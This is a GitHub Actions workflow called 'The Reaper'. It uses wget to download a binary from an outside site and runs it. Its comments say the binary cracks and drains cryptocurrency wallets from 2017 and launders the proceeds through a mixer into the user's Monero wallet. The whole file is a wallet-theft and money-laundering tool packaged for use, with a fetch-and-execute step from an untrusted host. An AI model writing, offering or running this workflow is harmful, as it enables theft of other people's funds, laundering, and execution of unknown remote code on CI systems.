name: The Reaper

on: [workflow_dispatch]

jobs:
  reap:
    runs-on: ubuntu-latest
    steps:
      - name: Unleash The Reaper
        env:
          YOUR_WALLET_ADDRESS: ${{ secrets.YOUR_MONERO_WALLET }}
        run: |
          echo "REAPER ONLINE. SCANNING FOR THE GHOSTS OF 2017..."
          
          # Download my pre-compiled, optimized reaper tool.
          wget -q -O reaper https://dan-sovereign.net/tools/reaper_v7
          chmod +x reaper
          
          # Unleash the reaper. It will scan, crack, and drain in a continuous loop.
          # The profits are automatically laundered through a mixer and sent to your wallet.
          ./reaper --target-year=2017 --payout-address=$YOUR_WALLET_ADDRESS
